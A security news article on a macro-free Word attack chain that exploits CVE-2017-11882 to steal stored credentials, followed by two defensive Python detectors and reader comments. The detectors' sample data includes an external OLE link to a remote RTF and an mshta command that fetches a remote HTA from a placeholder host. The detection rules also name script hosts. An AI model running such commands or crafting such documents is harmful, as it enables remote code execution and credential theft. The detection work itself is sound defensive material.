New threat vector: Latest Microsoft Word malware doesn’t use macros to unleash attack

A popular method of infecting users with malware has been Microsoft Office documents loaded with malicious macros. Chief among these are Word documents, because victims are easily social-engineered into downloading them. The main reason attackers favor Office documents is the exploitable nature of macros; that is why macros are disabled by default, although a user can choose to enable them. A new Microsoft Word malware attack shows, however, that macros are not necessary to infect a machine. Research from the security company Trustwave details a macro-free malware attack delivered via Word documents attached to email. The goal of the attack is to steal the credentials stored in the unsuspecting user’s email client, FTP client, and browsers via a “multi-stage email Word attack.”


The attack has four stages, which are as follows (with direct quotes from the Trustwave report):

  1. The .docx file (created with Word 2007) is opened, and this “allows external access to remote OLE objects to be referenced in the document.xml.rels”.
  2. The document triggers the download of an RTF file, which is then executed; the RTF file leverages an exploit for CVE-2017-11882, a vulnerability in the Microsoft Equation Editor tool.
  3. The RTF file will “execute an MSHTA command line which downloads and executes a remote HTA file. The HTA file contains VBScript… By decoding each character code in VBScript, it reveals a PowerShell Script which eventually … executes a remote binary file.”
  4. The malicious payload is executed, stealing credentials “by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist.”

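Stage 1 hinges on a relationship entry in document.xml.rels whose target lies outside the package. The following script is an added example, not code from the article or from Trustwave: it opens a .docx as the zip it is, parses the main document's relationship part, and reports external OLE-object relationships while leaving ordinary external hyperlinks alone. The two embedded packages are constructed for the demonstration, and the URL in them is a placeholder rather than an indicator from the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace used by every *.rels part in a .docx package
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
DOC_RELS_PART = "word/_rels/document.xml.rels"


def find_external_relationships(docx_bytes: bytes) -> list[dict]:
    """List every relationship in document.xml.rels whose TargetMode is External.

    Normal documents keep their parts inside the zip (TargetMode omitted or
    "Internal"); an external target points outside the package, which is what
    stage 1 of the described chain relies on.
    """
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if DOC_RELS_PART not in zf.namelist():
            return found  # no main-document rels part: nothing to inspect
        root = ET.fromstring(zf.read(DOC_RELS_PART))
    for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
        if rel.get("TargetMode", "Internal").lower() != "external":
            continue
        rel_type = rel.get("Type", "")
        short_type = rel_type[len(REL_TYPE_BASE):] if rel_type.startswith(REL_TYPE_BASE) else rel_type
        found.append({"id": rel.get("Id"), "type": short_type, "target": rel.get("Target")})
    return found


def external_ole_targets(docx_bytes: bytes) -> list[str]:
    """Only external relationships of type oleObject: the actual indicator.
    External hyperlinks are common in benign documents, so they are not flagged."""
    return [r["target"] for r in find_external_relationships(docx_bytes) if r["type"] == "oleObject"]


def build_sample_docx(rels_xml: str) -> bytes:
    """Constructed minimal package for exercising the check; real .docx files
    carry many more parts, but only document.xml.rels is read here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(DOC_RELS_PART, rels_xml)
    return buf.getvalue()


# Constructed samples; example.invalid is a placeholder, not an indicator from the report.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="{REL_TYPE_BASE}hyperlink" Target="https://example.invalid/" TargetMode="External"/>
</Relationships>"""

SUSPICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}styles" Target="styles.xml"/>
  <Relationship Id="rId7" Type="{REL_TYPE_BASE}oleObject" Target="http://example.invalid/stage2.rtf" TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
        print(label, external_ole_targets(build_sample_docx(rels)))
```

Run against real attachments at a mail gateway, `external_ole_targets` returning anything is worth quarantining for review; `find_external_relationships` is kept separate so analysts can also see the external hyperlinks without treating them as malicious.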
The only defense against this particular Word malware is to practice common-sense cybersecurity: be wary of any email that comes from an unknown source and, most importantly, do not download any document unless you are absolutely certain that it is necessary.
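Beyond user caution, stages 2 to 4 of the chain leave a distinctive process lineage on the endpoint. The script below is an added example, not from the article or Trustwave, that runs a few lineage rules over process-creation telemetry of the kind Sysmon or an EDR records. The field names, the sample events and the URL in them are constructed for the demonstration; the rules rest on the chain as the article describes it (Equation Editor being exploited, mshta.exe fetching a remote HTA, the HTA handing off to PowerShell).

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record; field names are this example's own."""
    pid: int
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list[str]:
    """Reasons this event matches the chain; an empty list means it looks normal."""
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    reasons = []
    # Stage 2: Equation Editor has no business starting other programs. It is
    # launched through DCOM (parent svchost.exe), so key on its children, not its parent.
    if parent == "eqnedt32.exe":
        reasons.append("Equation Editor (EQNEDT32.EXE) spawned a child process")
    # An Office application directly launching a script host.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} launched {child}")
    # Stage 3: mshta told to fetch and run a remote HTA.
    if child == "mshta.exe" and URL_RE.search(ev.command_line):
        reasons.append("mshta.exe invoked with a remote URL")
    # Stage 3 to 4: the HTA's VBScript handing off to PowerShell.
    if parent == "mshta.exe" and child == "powershell.exe":
        reasons.append("mshta.exe launched PowerShell")
    return reasons


def detect(events) -> list[tuple[int, list[str]]]:
    """Return (pid, reasons) for every event that trips at least one rule."""
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev.pid, reasons))
    return hits


# Constructed sample telemetry; example.invalid is a placeholder, not an indicator from the report.
SAMPLE_EVENTS = [
    ProcessEvent(100, r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Microsoft Office\Office12\WINWORD.EXE", "WINWORD.EXE /n invoice.docx"),
    ProcessEvent(101, r"C:\Windows\System32\svchost.exe",
                 r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE", "EQNEDT32.EXE -Embedding"),
    ProcessEvent(102, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                 r"C:\Windows\System32\mshta.exe", "mshta http://example.invalid/stage3.hta"),
    ProcessEvent(103, r"C:\Windows\System32\mshta.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -NoProfile -Command ..."),
    ProcessEvent(104, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for pid, reasons in detect(SAMPLE_EVENTS):
        print(pid, "; ".join(reasons))
```

Event 101, Equation Editor merely starting, is deliberately not flagged: it also appears when a legitimate document contains an equation. The alerts come from what it does next. Hosts patched against CVE-2017-11882 break the chain at stage 2, so the rules above are a backstop for the machines that are not.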

Photo credit: Shutterstock


4 thoughts on “New threat vector: Latest Microsoft Word malware doesn’t use macros to unleash attack”

  1. I imagine that anti-malware programs will have a very rough time discovering such malware. One more reason for us to start relying more on our heads and less on our security programs.

    1. Derek Kortepeter

      I totally agree, which is why I beat the drum of patch update management frequently in my articles. I tend to rant a lot about it. 🙂
